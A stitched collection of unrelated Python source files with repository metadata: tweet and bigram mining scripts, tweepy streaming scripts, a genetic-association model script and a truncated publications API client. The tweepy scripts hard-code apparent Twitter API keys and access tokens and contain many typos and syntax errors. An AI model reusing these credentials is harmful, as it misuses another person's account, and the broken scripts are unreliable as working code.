## this bit will save all the tweets with the date into a csv file with a date attached in the file name
str_today = 'tweets' + str(date.today().day) + '-' + str(date.today().month) + '-' + str(date.today().year) + '.csv'
f = open(str_today, "wb")
c = csv.writer(f, delimiter=",") ## this is the file that the csv will be written to
for x in xrange(0,len(tweet_csv)):
new_line = tweet_csv[x][0] + '' + tweet_csv[x][1] + '' + tweet_csv[x][2]
new_line = unicodedata.normalize('NFKD', new_line).encode('ascii','ignore')
new_line = str(new_line).translate(None, '.()\' ')
c.writerow([new_line])
f.close()
bigram_table = Datasheet()
all_tokens = []
for row in table:
tweet = str(row).lower()
tokens = []
for i in range(0,len(word_tokenize(tweet))):
if word_tokenize(tweet)[i] == '@':
tokens.append( str('@' + word_tokenize(tweet)[i+1]) )
if word_tokenize(tweet)[i] == '#':
tokens.append( str('#' + word_tokenize(tweet)[i+1]) )
new_bigrams = nltk.bigrams(tokens)
for bigram in new_bigrams:
bigram_table.append(bigram)
for token in tokens:
all_tokens.extend(tokens)
token_freq = nltk.FreqDist(all_tokens)
str_today = 'tweet_graph_' + str(date.today().day) + '-' + str(date.today().month) + '-' + str(date.today().year) + '.csv'
bigram_table.save(str_today)
new_twitter_subjects = list(set(all_tokens))
another_table = Datasheet()
# save the original list of twitter users, we'll use this in cytoscape
spamWriter = csv.writer(open('original_twitter.csv', 'wb'), delimiter=' ', quotechar='|')
for i in list(set(all_tokens)):
spamWriter.writerow([i, 1])
for twitter_subject in new_twitter_subjects:
# With cached=False, a live request is sent to Twitter,
# so we get the latest results for the query instead of those in the local cache.
for tweet in engine.search(twitter_subject, count=275, cached=False):
# Create a unique ID based on the tweet content and author.
id = hash(tweet.author + tweet.description)
# Only add the tweet to the another_table if it doesn't already contain this ID.
if len(another_table) == 0 or id not in index:
another_table.append([' @'+tweet.author + ' ' + tweet.description])
index[id] = True
another_table.save("even_moretweets.txt", delimiter=" ")
print "Total results:", len(another_table)
big_bigram_table = Datasheet()
big_all_tokens = []
for row in another_table:
tweet = str(row).lower()
tokens = []
for i in range(0,len(word_tokenize(tweet))):
if word_tokenize(tweet)[i] == '@':
tokens.append( str('@' + word_tokenize(tweet)[i+1]) )
if word_tokenize(tweet)[i] == '#':
tokens.append( str('#' + word_tokenize(tweet)[i+1]) )
new_bigrams = nltk.bigrams(tokens)
for bigram in new_bigrams:
big_bigram_table.append(bigram)
for token in tokens:
big_all_tokens.extend(tokens)
token_freq = nltk.FreqDist(big_all_tokens)
str_today = 'tweet_graph_' + str(date.today().day) + '-' + str(date.today().month) + '-' + str(date.today().year) + '.csv'
big_bigram_table.save("biggest_tweet_graph2.csv") | {
"repo_name": "InnoViz/innoviz-frontend",
"path": "app/data miner scripts/TWITTER GRAPH/twitter_miner.py",
"copies": "1",
"size": "6330",
"license": "mit",
"hash": -6059324430615256000,
"line_mean": 41.4899328859,
"line_max": 122,
"alpha_frac": 0.6551342812,
"autogenerated": false,
"ratio": 3.4383487235198262,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4593483004719826,
"avg_score": null,
"num_lines": null
} |
## appsterdam website data
## usage: call this script followed by a text file
## the script will then create a .csv file with all bigrams and their weight in the file
## the cript is aimed at showing info from the appsterdam member profiles
## example calls:
## $ python getBigram.py example.txt
## $ python getBigram.py member_descripion
## prerequisites:
## python 2.7.3
## nltk package
## output : a csv file containing all the bigrams and the frequency
## a csv file containing the frequency of each word
import nltk
from nltk.tokenize import word_tokenize, wordpunct_tokenize, sent_tokenize
from nltk.collocations import *
bigram_measures = nltk.collocations.BigramAssocMeasures()
trigram_measures = nltk.collocations.TrigramAssocMeasures()
import re
from collections import Counter
import sys
import itertools
import csv
## dump all the text from a source in a text file
print sys.argv[1]
f = open(sys.argv[1])
raw = f.read()
raw = raw.lower()
tokens = nltk.word_tokenize(raw)
nonPunct = re.compile('.*[A-Za-z].*') ## remove punctuation
filtered = [w for w in tokens if nonPunct.match(w)] ## remove punctuation
tokens = filtered ## remove punctuation
stops = ['wij', 'zijn', 'do', 'a','the','i', 'and', 'an', 'am', 'aan', 'de', 'to', "\'", "it", "in", 'at', 'for', 'of', 'en', 'on', 'is', 'with', 'we', 'are', 'if', 'you', 'op'] ## define stopwords
corpus =[token for token in tokens if token not in stops]
tokens = corpus
text = nltk.Text(tokens)
fdist = nltk.FreqDist([w.lower() for w in text])
def typesOfUsers(fdist):
languages = ['ruby', 'ios', 'c', 'javascript', 'html', 'android', 'python', 'rails', 'cocoa', 'php']
designer = ['ux', 'design', 'designer', 'creative', 'ui', 'social', 'media']
business = ['consultant', 'consultancy', 'founder', 'startup', 'startups', 'founder', 'co-founder', 'investor', 'entrepreneur', 'manager']
other = ['mobile', 'software', 'app', 'iphone', 'ipad', 'web', 'android', 'geek', 'amsterdam']
for x in languages:
print x + "," + str(fdist[x])
for x in designer:
print x + "," + str(fdist[x])
for x in business:
print x + "," + str(fdist[x])
for x in other:
print x + "," + str(fdist[x])
typesOfUsers(fdist)
def hashtagsToBigrams(hastags): # method not done!!!
# input of the file should be in this format:
#amsterdamrs #iosdevcamp #mac
#amsterdam #appsterdam
#iosdevcamp #amsterdam
# ... etc
# output wil be a list of all bigrams and how often they occur
for row in hashtags:
print itertools.combinations(hastags,2)
## this bit is for printing out the most frequent words
print "\n The most frequent words \n"
print fdist.keys()[:20]
print fdist.values()[:20]
## this bit is for printing out the most frequent bigrams
print "\n The most frequent bigrams of words \n"
num_bigrams = 30
bigram_fd = nltk.FreqDist(nltk.bigrams(tokens))
finder = BigramCollocationFinder.from_words(tokens)
scored = finder.score_ngrams(bigram_measures.raw_freq)
interestig_bigrams = sorted(finder.nbest(trigram_measures.raw_freq, num_bigrams))
print sorted(finder.nbest(trigram_measures.raw_freq, num_bigrams))
## this bit will print out a string that can be copy pasted into csv
f = open("graph_input.csv", "wb")
c = csv.writer(f, delimiter=",") ## this is the file that the csv will be written to
for x in xrange(0,num_bigrams):
new_line = str(bigram_fd.keys()[x]) + "," + str(bigram_fd.values()[x])
new_line = new_line.translate(None, '.()\' ')
c.writerow([new_line])
f.close()
## this bit will add a csv containing info about how often words are used
f = open("node_sizes.csv", "wb")
c = csv.writer(f, delimiter=",") ## this is the file that the csv will be written to
token_freqd = nltk.FreqDist(tokens)
for x in xrange(0,200):
new_line = str(token_freqd.keys()[x]) + "," + str(token_freqd.values()[x])
new_line = new_line.translate(None, '.()\' ')
c.writerow([new_line])
f.close() | {
"repo_name": "InnoViz/innoviz-frontend",
"path": "app/data miner scripts/MEETUP DESCRIPTIONS/getBigram.py",
"copies": "1",
"size": "4003",
"license": "mit",
"hash": 1509050209851694800,
"line_mean": 36.4205607477,
"line_max": 201,
"alpha_frac": 0.6655008743,
"autogenerated": false,
"ratio": 2.949889462048637,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.8938812769213762,
"avg_score": 0.03531551342697515,
"num_lines": 107
} |
#apps.twiiter.com/app
#dev.twitter.com/overview/api
#dev.twiiter.com/rest/tools/console
import jason
from os import path
from tweepy import OAuthHandler,Stream,API
from tweepy.streaming import StreaemListener
from sqlalchmey.orm.exc import NoResultFound
from database.database import session, Tweet, Hashtag, User
Consumer_Key = '8cHXrID1ZvQ6utL8lh8kWHOYJ'
Consumer_Secret = 'nCSeqQtsleaXG4PktUSMOkuXtJT49jydtxIdh3zzJIQLI19cxX'
Access_Token = '464285465-y2Er901orSXkC9YL8nquBr9t82xwOTnSo2oJhERW'
Access_Token_Secret = 'JFHpQdipiGqdarZbkDBWWgKRueINytB8g3THrhVlsiJUY'
auth = OAuthHandler(Consumer_Key,Consumer_Secret)
auth.set_access_token(Access_Token,Access_Token_Secret)
def save_tweets():
directory = _get_dir_absolute_path()
filepath = path.join(directory,'tweets.jason')
listener = DatabaseListener(number_tweets_to_save = 1000,
filepath = filepath)
stream = (Stream.auth,listener)
languages = 'en'
try:
stream.sample(languages= languages)
except KeyboardInterrup:
listener.file.close()
class DatabseListener(StreamListener):
def __init__(self,number_twets_to_save,filepath = None):
self._final_count = number_tweets_to_save
self._current_count = 0
if filepath is None:
filepath = tweets.txt
self.file = open(filepath,'w')
#Note: Slightly denagrous due to circular reference
def __del__(self):
self.file.colse()
def on_data(self,raw_data):
data = jason.load(raw_data)
jason.dump(raw_data,self.file)
self.file.write(''\n)
if 'in_reply_to_status_id' in data:
return self.on_status(data)
def on_status(self,data):
#This method is defined in this file
save_to_databse(data)
self._current_count+=1
print('Status count :{}'.format(self,_current_count))
if self._current_count >= self._final_count:
return Fasle
| {
"repo_name": "deepak223098/Data_Science_Python",
"path": "save_tweets.py",
"copies": "1",
"size": "2215",
"license": "bsd-3-clause",
"hash": 1407042142139546000,
"line_mean": 33.0769230769,
"line_max": 71,
"alpha_frac": 0.6081264108,
"autogenerated": false,
"ratio": 3.41820987654321,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.452633628734321,
"avg_score": null,
"num_lines": null
} |
#apps.twiiter.com/app
#dev.twitter.com/overview/api
#dev.twiiter.com/rest/tools/console
import jason
from tweepy import OAuthHandler,Stream,API
from tweepy.streaming import StreaemListener
Consumer_Key = '8cHXrID1ZvQ6utL8lh8kWHOYJ'
Consumer_Secret = 'nCSeqQtsleaXG4PktUSMOkuXtJT49jydtxIdh3zzJIQLI19cxX'
Access_Token = '464285465-y2Er901orSXkC9YL8nquBr9t82xwOTnSo2oJhERW'
Access_Token_Secret = 'JFHpQdipiGqdarZbkDBWWgKRueINytB8g3THrhVlsiJUY'
auth = OAuthHandler(Consumer_Key,Consumer_Secret)
auth.set_access_token(Access_Token,Access_Token_Secret)
Class PrintListener(StreamListerner):
def on_status(self,status):
if not status.text[:3] == 'RT':
print(status.text)
print(status.author,screen_name,status.created_at,status.cource,'\n')
def on_error(self,status_code):
print("Error Code: {}".format(status_code))
return True #Keep Stream alive
def on_timeout(self):
print("Listener timed out")
return True #Keep Steam alive
def print_to_terminal():
listener = PrintListener()
stream = Stream(auth,listener)
languages = (en',)
stream.sample(languages=languages)
def pull_down_tweets(screen_name):
api = API(auth)
tweets = api.user_timeline(screen_name = screen_name,count = 200)
for tweet in tweets:
print(jason.dumps(tweet._json,ident = 3))
if __name__ =='__main__':
#print_to_terminal()
pull_down_tweets(auth.username)
| {
"repo_name": "deepak223098/Data_Science_Python",
"path": "twitter_data_access.py",
"copies": "1",
"size": "1807",
"license": "bsd-3-clause",
"hash": 2231767341651695900,
"line_mean": 36.6458333333,
"line_max": 96,
"alpha_frac": 0.5733259546,
"autogenerated": false,
"ratio": 3.5155642023346303,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.458889015693463,
"avg_score": null,
"num_lines": null
} |
#!/apps/well/python/2.7.8/bin/python
"""
Usage: hlmm_chr.py
This script fits heteroskedastic linear models or heteroskedastic linear mixed models to a sequence of genetic variants
contained in a .bed file. You need to specify the genotypes.bed file, which also has genotypes.bim and genotypes.fam in
the same directory, along with the start and end indices of segment you want the script to fit models to.
The script runs from start to end-1 inclusive, and the first SNP has index 0.
The script is designed to run on a chromosome segment to facilitate parallel computing on a cluster.
The phenotype file and covariate file formats are the same: FID, IID, Trait1, Trait2, ...
If you specify a random_gts.bed file with the option --random_gts, the script will model random effects for
all of the variants specified in random_gts.bed. If no --random_gts are specified, then heteroskedastic linear
models are used, without random effects. If you add the flag --random_gts_txt, the program assumes that the file
specified for --random_gts is a text file formatted as: FID, IID, x1, x2, ...
Minimally, the script will output a file outprefix.models.gz, which contains a table of the additive
and log-linear variance effects estimated for each variant in the bed file.
If --random_gts are specified, the script will output an estimate of the variance of the random effects
in the null model in outprefix.null_h2.txt. --no_h2_estimate suppresses this output.
If covariates are also specified, it will output estimates of the covariate effects from the null model as
outprefix.null_mean_effects.txt and outprefix.null_variance_effects.txt. --no_covariate_estimates suppresses this output.
"""
from hlmm import hetlm
from hlmm import hetlmm
import argparse
import numpy as np
from pysnptools.snpreader import Bed, Pheno
from scipy.stats import chi2, zscore
####### Output functions ##########
def neglog10pval(x,df):
return -np.log10(np.e)*chi2.logsf(x,df)
def vector_out(alpha,se,digits=4):
##Output parameter estimates along with standard errors, t-statistics, and -log10(p-values) ##
## Calculate test statistics
# t-statistic
t=alpha/se
# chi-square statistic
x2=np.square(t)
# Create output strings
if len(alpha.shape)==0:
pval=neglog10pval(x2,1)
alpha_print=str(round(alpha,digits))+'\t'+str(round(se,digits))+'\t'+str(round(t,digits))+'\t'+str(round(pval,digits))
else:
pvals=[neglog10pval(x,1) for x in x2]
alpha_print=''
for i in xrange(0,len(alpha)-1):
alpha_print+=str(round(alpha[i],digits))+'\t'+str(round(se[i],digits))+'\t'+str(round(t[i],digits))+'\t'+str(round(pvals[i],digits))+'\t'
i+=1
alpha_print+=str(round(alpha[i],digits))+'\t'+str(round(se[i],digits))+'\t'+str(round(t[i],digits))+'\t'+str(round(pvals[i],digits))
return alpha_print
def id_dict_make(ids):
## Make a dictionary mapping from IDs to indices ##
if not type(ids)==np.ndarray:
raise(ValueError('Unsupported ID type: should be numpy nd.array'))
id_dict={}
for id_index in xrange(0,len(ids)):
id_dict[tuple(ids[id_index,:])]=id_index
return id_dict
def read_covariates(covar_file,ids_to_match,missing):
## Read a covariate file and reorder to match ids_to_match ##
# Read covariate file
covar_f = Pheno(covar_file, missing=missing).read()
ids = covar_f.iid
# Get covariate values
n_X=covar_f._col.shape[0]+1
X=np.ones((covar_f.val.shape[0],n_X))
X[:, 1:n_X] = covar_f.val
# Get covariate names
X_names = np.zeros((n_X), dtype='S10')
X_names[0] = 'Intercept'
X_names[1:n_X] = np.array(covar_f._col, dtype='S20')
# Remove NAs
NA_rows = np.isnan(X).any(axis=1)
n_NA_row = np.sum(NA_rows)
if n_NA_row>0:
print('Number of rows removed from covariate file due to missing observations: '+str(np.sum(NA_rows)))
X = X[~NA_rows]
ids = ids[~NA_rows]
id_dict = id_dict_make(ids)
# Match with pheno_ids
ids_to_match_tuples = [tuple(x) for x in ids_to_match]
common_ids = id_dict.viewkeys() & set(ids_to_match_tuples)
pheno_in = np.array([(tuple(x) in common_ids) for x in ids_to_match])
match_ids = ids_to_match[pheno_in,:]
X_id_match = np.array([id_dict[tuple(x)] for x in match_ids])
X = X[X_id_match, :]
return [X,X_names,pheno_in]
######### Command line arguments #########
if __name__ == '__main__':
parser=argparse.ArgumentParser()
parser.add_argument('genofile',type=str,help='Path to genotypes in BED format')
parser.add_argument('start',type=int,help='Index of SNP in genofile from which to start computing test stats')
parser.add_argument('end',type=int,help='Index of SNP in genofile at which to finish computing test stats')
parser.add_argument('phenofile',type=str,help='Location of the phenotype file')
parser.add_argument('outprefix',type=str,help='Location to output csv file with association statistics')
parser.add_argument('--mean_covar',type=str,help='Location of mean covariate file (default None)',
default=None)
parser.add_argument('--var_covar',type=str,help='Location of variance covariate file (default None)',
default=None)
parser.add_argument('--fit_covariates',action='store_true',
help='Fit covariates for each locus. Default is to fit for null model and project out (mean) and rescale (variance)',
default=False)
parser.add_argument('--random_gts',type=str,help='Location of the BED file with the genotypes of the SNPs that random effects should be modelled for',default=None)
parser.add_argument('--random_gts_txt',action='store_true',default=False,help='Random effect design matrix supplied as text file with columns: FID, IID, x1, x2, ... Overrides assumed .bed formatting')
parser.add_argument('--h2_init',type=float,help='Initial value for variance explained by random effects (default 0.05)',
default=0.05)
parser.add_argument('--phen_index',type=int,help='If the phenotype file contains multiple phenotypes, which phenotype should be analysed (default 1, first)',
default=1)
parser.add_argument('--min_maf',type=float,help='Ignore SNPs with minor allele frequency below min_maf (default 0.05)',default=0.05)
parser.add_argument('--missing_char',type=str,help='Missing value string in phenotype file (default NA)',default='NA')
parser.add_argument('--max_missing',type=float,help='Ignore SNPs with greater percent missing calls than max_missing (default 5)',default=5)
parser.add_argument('--append',action='store_true',default=False,help='Append results to existing output file with given outprefix (default overwrites existing')
parser.add_argument('--whole_chr',action='store_true',default=False,help='Fit models to all variants in .bed genofile')
parser.add_argument('--no_covariate_estimates',action='store_true',default=False,help='Suppress output of covariate effect estimates')
parser.add_argument('--no_h2_estimate',action='store_true',default=False,help='Suppress output of h2 estimate')
args=parser.parse_args()
####################### Read in data #########################
#### Read phenotype ###
pheno = Pheno(args.phenofile, missing=args.missing_char).read()
y = np.array(pheno.val)
pheno_ids = np.array(pheno.iid)
if y.ndim == 1:
pass
elif y.ndim == 2:
y = y[:, args.phen_index - 1]
else:
raise (ValueError('Incorrect dimensions of phenotype array'))
# Remove y NAs
y_not_nan = np.logical_not(np.isnan(y))
if np.sum(y_not_nan) < y.shape[0]:
y = y[y_not_nan]
pheno_ids = pheno_ids[y_not_nan,:]
# Make id dictionary
print('Number of non-missing phenotype observations: ' + str(y.shape[0]))
### Get covariates
## Get mean covariates
if not args.mean_covar == None:
X, X_names, pheno_in = read_covariates(args.mean_covar,pheno_ids, args.missing_char)
n_X = X.shape[1]
# Remove rows with missing values
if np.sum(pheno_in) < y.shape[0]:
y = y[pheno_in]
pheno_ids = pheno_ids[pheno_in,:]
# Normalise non-constant cols
X_stds = np.std(X[:, 1:n_X], axis=0)
X[:, 1:n_X] = zscore(X[:, 1:n_X], axis=0)
else:
X = np.ones((int(y.shape[0]), 1))
n_X = 1
X_names = np.array(['Intercept'])
## Get variance covariates
if not args.var_covar == None:
V, V_names, pheno_in = read_covariates(args.var_covar,pheno_ids, args.missing_char)
n_V = V.shape[1]
# Remove rows with missing values
if np.sum(pheno_in) < y.shape[0]:
y = y[pheno_in]
pheno_ids = pheno_ids[pheno_in,:]
# Normalise non-constant cols
V_stds = np.std(V[:, 1:n_V], axis=0)
V[:, 1:n_V] = zscore(V[:, 1:n_V], axis=0)
else:
V = np.ones((int(y.shape[0]), 1))
n_V = 1
V_names = np.array(['Intercept'])
n_pars = n_X + n_V + 1
print(str(n_pars) + ' parameters in model')
### Read genotypes ###
test_chr = Bed(args.genofile)
# select subset to test
if args.whole_chr:
sid = test_chr.sid
pos = test_chr.pos
test_chr = test_chr.read()
else:
sid = test_chr.sid[args.start:args.end]
pos = test_chr.pos[args.start:args.end]
test_chr = test_chr[:, args.start:args.end].read()
genotypes = test_chr.val
# Get genotype matrix
if genotypes.ndim == 1:
chr_length = 1
genotypes = genotypes.reshape(genotypes.shape[0], 1)
else:
chr_length = genotypes.shape[1]
print('Number of test loci: ' + str(genotypes.shape[1]))
print('Genotypes for '+str(genotypes.shape[0])+' individuals read')
# Get sample ids
geno_id_dict = id_dict_make(np.array(test_chr.iid))
# Intersect with phenotype IDs
ids_in_common = {tuple(x) for x in pheno_ids} & geno_id_dict.viewkeys()
pheno_ids_in_common = np.array([tuple(x) in ids_in_common for x in pheno_ids])
y = y[pheno_ids_in_common]
pheno_ids = pheno_ids[pheno_ids_in_common,:]
pheno_id_dict = id_dict_make(pheno_ids)
X = X[pheno_ids_in_common,:]
V = V[pheno_ids_in_common,:]
geno_id_match = np.array([geno_id_dict[tuple(x)] for x in pheno_ids])
genotypes = genotypes[geno_id_match, :]
# Get sample size
n = genotypes.shape[0]
if n == 0:
raise (ValueError('No non-missing observations with both phenotype and genotype data'))
print(str(n) + ' individuals in genotype file with no missing phenotype or covariate observations')
n = float(n)
#### Read random effect genotypes ####
if args.random_gts is not None:
if args.random_gts_txt:
random_gts_f = Pheno(args.random_gts)
else:
random_gts_f = Bed(args.random_gts)
random_gts_ids = np.array(random_gts_f.iid)
random_gts_f = random_gts_f.read()
# Match to phenotypes
G_random = random_gts_f.val
G = np.empty((genotypes.shape[0], G_random.shape[1]))
G[:] = np.nan
for i in xrange(0, random_gts_ids.shape[0]):
if tuple(random_gts_ids[i, :]) in pheno_id_dict:
G[pheno_id_dict[tuple(random_gts_ids[i, :])], :] = G_random[i, :]
del G_random
# Check for NAs
random_isnan = np.isnan(G)
random_gts_NAs = np.sum(random_isnan, axis=0)
gts_with_obs = list()
if np.sum(random_gts_NAs) > 0:
print('Mean imputing missing genotypes in random effect design matrix')
for i in xrange(0, G.shape[1]):
if random_gts_NAs[i] < G.shape[0]:
gts_with_obs.append(i)
if random_gts_NAs[i] > 0:
gt_mean = np.mean(G[np.logical_not(random_isnan[:, i]), i])
G[random_isnan[:, i], i] = gt_mean
# Keep only columns with observations
if len(gts_with_obs) < G.shape[1]:
G = G[:, gts_with_obs]
G = zscore(G, axis=0)
# Rescale random effect design matrix
G = np.power(G.shape[1], -0.5) * G
print(str(int(G.shape[1])) + ' loci in random effect')
else:
G = None
######### Initialise output files #######
## Output file
if args.append:
write_mode='ab'
else:
write_mode='wb'
outfile=open(args.outprefix+'.models.gz',write_mode)
if not args.append:
header='SNP\tn\tfrequency\tlikelihood\tadd\tadd_se\tadd_t\tadd_pval\tvar\tvar_se\tvar_t\tvar_pval\tav_pval\n'
outfile.write(header)
######### Fit Null Model ##########
## Get initial guesses for null model
print('Fitting Null Model')
# Optimize null model
null_optim= hetlm.model(y, X, V).optimize_model()
## Record fitting of null model
# Get print out for fixed mean effects
alpha_out=np.zeros((n_X,2))
alpha_out[:,0]=null_optim['alpha']
alpha_out[:,1]=null_optim['alpha_se']
# Rescale
if n_X>1:
for i in xrange(0,2):
alpha_out[1:n_X,i] = alpha_out[1:n_X,i]/X_stds
if not args.append and not args.no_covariate_estimates and args.mean_covar is not None:
np.savetxt(args.outprefix + '.null_mean_effects.txt',
np.hstack((X_names.reshape((n_X, 1)), np.array(alpha_out, dtype='S20'))),
delimiter='\t', fmt='%s')
# variance effects
beta_out=np.zeros((n_V,2))
beta_out[0:n_V,0]=null_optim['beta']
beta_out[0:n_V,1]=null_optim['beta_se']
# Rescale
if n_V>1:
for i in xrange(0,2):
beta_out[1:n_X,i] = beta_out[1:n_X,i]/V_stds
if not args.append and not args.no_covariate_estimates and args.var_covar is not None:
np.savetxt(args.outprefix + '.null_variance_effects.txt',
np.hstack((V_names.reshape((n_V, 1)), np.array(beta_out, dtype='S20'))),
delimiter='\t', fmt='%s')
### Project out mean covariates and rescale if not fitting for each locus
if not args.fit_covariates:
# Residual y
y=y-X.dot(null_optim['alpha'])
# Reformulate fixed_effects
X=np.ones((int(n),1))
n_X=1
# Rescaled residual y
D_null_sqrt=np.exp(0.5*V.dot(null_optim['beta']))
y=y/D_null_sqrt
# Reformulate fixed variance effects
V=np.ones((int(n),1))
n_V=1
# Initialise h2
if G is not None:
if args.no_h2_estimate:
h2_init = args.h2_init
else:
print('Estimating h2 in null model')
null_optim = hetlmm.model(y, X, V, G).optimize_model(args.h2_init)
h2_init = null_optim['h2']
# Save null h2 estimate
if not args.append:
np.savetxt(args.outprefix + '.null_h2.txt',
np.array([null_optim['h2'], null_optim['h2_se']], dtype='S20'),
delimiter='\t', fmt='%s')
############### Loop through loci and fit AV models ######################
print('Fitting models for specified loci')
for loc in xrange(0,chr_length):
# Filler for output if locus doesn't pass thresholds
additive_av_out='NaN\tNaN\tNaN\tNaN'
variance_out='NaN\tNaN\tNaN\tNaN'
likelihood=np.nan
allele_frq=np.nan
av_pval=np.nan
# Get test genotypes
test_gts=genotypes[:,loc]
# Find missingness and allele freq
test_gt_not_na=np.logical_not(np.isnan(test_gts))
n_l=np.sum(test_gt_not_na)
missingness = 100.0 * (1 - float(n_l) / n)
if missingness<args.max_missing:
test_gts=test_gts[test_gt_not_na]
test_gts = test_gts.reshape((test_gts.shape[0], 1))
allele_frq=np.mean(test_gts)/2
# Mean normalise genotype vector
test_gts = test_gts - 2*allele_frq
if allele_frq>0.5:
allele_frq=1-allele_frq
if allele_frq>args.min_maf:
# Remove missing data rows
y_l=y[test_gt_not_na]
X_l=X[test_gt_not_na,:]
V_l=V[test_gt_not_na,:]
# Add test locus genotypes to mean and variance fixed effect design matrices
X_l=np.hstack((X_l,test_gts))
V_l=np.hstack((V_l,test_gts))
# Record standard deviation of test gt
print('Fitting AV model for locus '+str(loc))
if G is not None:
G_l = G[test_gt_not_na, :]
av_optim = hetlmm.model(y_l, X_l, V_l, G_l).optimize_model(h2_init)
h2_init = av_optim['h2']
else:
av_optim= hetlm.model(y_l, X_l, V_l).optimize_model()
# Check convergence success
if av_optim['success']:
# Likelihood
likelihood=av_optim['likelihood']
# Mean effect of locus
additive_av_out=vector_out(av_optim['alpha'][n_X],av_optim['alpha_se'][n_X],6)
# Variance effect of locus
variance_out=vector_out(av_optim['beta'][n_V],av_optim['beta_se'][n_V],6)
av_pval=neglog10pval((av_optim['alpha'][n_X]/av_optim['alpha_se'][n_X])**2+(av_optim['beta'][n_V]/av_optim['beta_se'][n_V])**2,2)
else:
print('Maximisation of likelihood failed for for '+sid[loc])
outfile.write(sid[loc] + '\t'+str(n_l)+'\t'+ str(allele_frq)+'\t'+str(likelihood)+'\t'+additive_av_out+'\t'+variance_out+'\t'+str(round(av_pval,6))+'\n')
outfile.close() | {
"repo_name": "AlexTISYoung/hlmm",
"path": "bin/hlmm_chr.py",
"copies": "1",
"size": "17791",
"license": "mit",
"hash": -4963762059286151000,
"line_mean": 45.5759162304,
"line_max": 204,
"alpha_frac": 0.6055308864,
"autogenerated": false,
"ratio": 3.1741302408563783,
"config_test": true,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.921510735431807,
"avg_score": 0.012910754587661668,
"num_lines": 382
} |
#app = symplectic
from datetime import datetime
import urllib
from xml.etree.ElementTree import ElementTree, Element, SubElement, XML
from xml.parsers.expat import ExpatError
import urllib2
import os
from publications.models import (
Publication, BibliographicRecord, BiblioURL, Authored
)
SYMPLECTIC_API_URL = 'http://medic3.cardiff.ac.uk:8090/publications-api/v3.4/'
SYMPLECTIC_XMLNS_URI = 'http://www.symplectic.co.uk/publications/api'
SYMPLECTIC_NAMESPACE = '{' + SYMPLECTIC_XMLNS_URI + '}'
SYMPLECTIC_LOCAL_XML_FOLDER = '/tmp/symplectic/'
SYMPLECTIC_LOCAL_AUTH_FOLDER = 'userpubs/'
SYMPLECTIC_LOCAL_PUBS_FOLDER = 'pubs/'
SYMPLECTIC_LOCAL_PUBSMODIFIED_FOLDER = 'pubsmodified/'
SYMPLECTIC_LOCAL_USER_FOLDER = 'usersadmin/'
SYMPLECTIC_LOCAL_USER_IMPORTFILE = 'import_users.xml'
SYMPLECTIC_LOCAL_USER_CLEARFILE = 'clear_users.xml'
AUTHENTICATING_AUTHORITY = 'CARDIFFLDAP'
IMPORT_USERS_FEED_ID = 'django arkestra'
TIMESTAMP = str(datetime.now())
class User(object):
def __init__(self):
self.title = ''
self.initials = ''
self.first_name = ''
self.last_name = ''
self.known_as = ''
self.suffix = ''
self.email = ''
self.authenticating_authority = ''
self.username = ''
self.proprietary_id = ''
self.send_usersr = ''
self.is_academic = ''
self.generic_field_1_dept = ''
self.generic_field_2_dept_id = ''
self.generic_field_11_irg = ''
self.generic_field_12_irg_id = ''
self.generic_field_13_admin = ''
self.generic_field_14_institute = ''
self.generic_field_15_institute_id = ''
# functions for creating users
def clear_users():
# Sends an XML File to Symplectic API asking it to clear all users
filename = __createXMLFileForClear()
response = __postClearUsersXMLFileToSymplectic(
filename
)
count = _get_cleared_user_count(response)
return count
def send_users(researcher_list):
# Sends an XML File of Users to Symplectic, to its API
userlist = _create_symplectic_user_list(researcher_list)
xml_filename = _create_xml_users_file(userlist)
symplectic_response = _post_xml_users_file(xml_filename)
created_count = _get_created_user_count(symplectic_response)
return created_count
def __createXMLFileForClear():
# Builds an XML File to ask Symplectic to clear all users
clear_root = Element(
'clear-users-request',
{'xmlns': SYMPLECTIC_XMLNS_URI}
)
# Feed
SubElement(clear_root, 'feed-id').text = IMPORT_USERS_FEED_ID
#Convert to ElementTree and write xml version to file
xml_filename = "".join([
SYMPLECTIC_LOCAL_XML_FOLDER,
SYMPLECTIC_LOCAL_USER_FOLDER,
TIMESTAMP,
SYMPLECTIC_LOCAL_USER_CLEARFILE
])
ElementTree(clear_root).write(xml_filename)
print "clearing with", xml_filename
return xml_filename
def __postClearUsersXMLFileToSymplectic(xml_filename):
# Actually performs the HTTP POST of the XML File to Symplectic API,
# asking it to clear users
#prepare the HTTP request with the XML file of ClearUsers as the payload
url = SYMPLECTIC_API_URL + 'clear-users'
headers = {'Content-Type': 'text/xml'}
xml_file = open(xml_filename, 'r')
data = xml_file.read()
req = urllib2.Request(url, data, headers)
#POST the HTTP request to Symplectic API
try:
response = urllib2.urlopen(req)
the_page = response.read()
return the_page
except urllib2.URLError:
raise ESymplecticPostFileError("""
Could not HTTP POST the CLEAR Users XML file to Symplectic API
""")
def _get_cleared_user_count(xml_string):
# Extracts the count from the symplectic response to the XML file clear
try:
response_element = XML(xml_string)
cleared_count = response_element.attrib.get("count")
return cleared_count
except ExpatError:
raise ESymplecticParseFileError("""
Could not extract the number of Users cleared from the XML file
returned by Symplectic API
""")
def _get_created_user_count(xml_string):
"""
Extracts the count from the symplectic response to the XML file of Users
we sent it
"""
try:
response_element = XML(xml_string)
created_count = response_element.attrib.get("count")
return created_count
except ExpatError:
raise ESymplecticParseFileError("""
Could not extract the number of Users created from the XML file
returned by Symplectic API
""")
def _determine_institute(researcher):
# Determines which Entity within researcher.person.member_of is their
# Institute
try:
return researcher.person.member_of.filter(
entity__in=[5],
importance_to_person=5)[0].entity
except IndexError:
return None
def _post_xml_users_file(xml_filename):
"""
Actually performs the HTTP POST of the XML File of Users we want to ask
Symplectic to create, to its API
"""
#prepare the HTTP request with the XML file of Users as the payload
url = SYMPLECTIC_API_URL + 'import-users'
headers = {'Content-Type': 'text/xml'}
xml_file = open(xml_filename, 'r')
data = xml_file.read()
req = urllib2.Request(url, data, headers)
#POST the HTTP request to Symplectic API
try:
response = urllib2.urlopen(req)
the_page = response.read()
return the_page
except (urllib2.URLError,):
raise ESymplecticPostFileError(
"Could not HTTP POST the CREATE Users XML file to Symplectic API"
)
def _create_xml_users_file(user_objectlist):
